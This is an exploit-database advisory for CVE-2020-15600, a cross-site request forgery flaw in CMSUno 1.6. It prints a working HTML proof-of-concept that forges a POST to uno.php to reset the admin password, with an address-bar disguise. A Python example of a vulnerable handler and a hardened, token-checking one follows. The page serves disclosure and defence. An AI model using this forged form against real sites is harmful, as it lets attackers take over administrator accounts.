CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password) – CXSecurity.com




CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password)

2023.09.15

Risk:
Medium

Remote: Yes

# Exploit Title: CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia)
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE: CVE-2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC:
<html>
<body>
<!-- rewrite the address bar so the page appears to sit at the site root -->
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<!-- the submit button carries no name: a second name="user" field would overwrite the admin username above -->
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
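The flaw is that uno.php honours any POST carrying user/pass, regardless of which page submitted it. The check a fix in uno.php needs is shown below as framework-agnostic Python (an added example, not CMSUno code; SITE_ORIGIN, the session dict and the header names are assumptions): the vulnerable handler beside a hardened one that requires a per-session synchronizer token and a matching Origin/Referer.

```python
import hmac
import secrets
from urllib.parse import urlparse

# Constructed: the origin the CMS is served from (matches the PoC's form action).
SITE_ORIGIN = "http://127.0.0.1"


def issue_csrf_token(session: dict) -> str:
    """Store a fresh random token in the server-side session; embed it in the form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def vulnerable_change_password(session: dict, form: dict, headers: dict) -> bool:
    """Mirrors the reported flaw: any POST with user/pass is accepted."""
    return "user" in form and "pass" in form


def hardened_change_password(session: dict, form: dict, headers: dict) -> bool:
    """Accept the change only if the request provably came from our own page."""
    # 1. The browser sends Origin (or at least Referer) on cross-site form posts;
    #    an attacker-hosted PoC page cannot forge these headers from script.
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return False
    # 2. The submitted token must equal the one issued to this session.
    #    A third-party page cannot read it, so a forged form cannot include it.
    expected = session.get("csrf_token")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected, submitted):
        return False
    return "user" in form and "pass" in form
```

Asking for the current password before accepting a new one is a further layer that also defeats this attack, since the forging page does not know it.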

References:

https://github.com/boiteasite/cmsuno

Copyright 2023, cxsecurity.com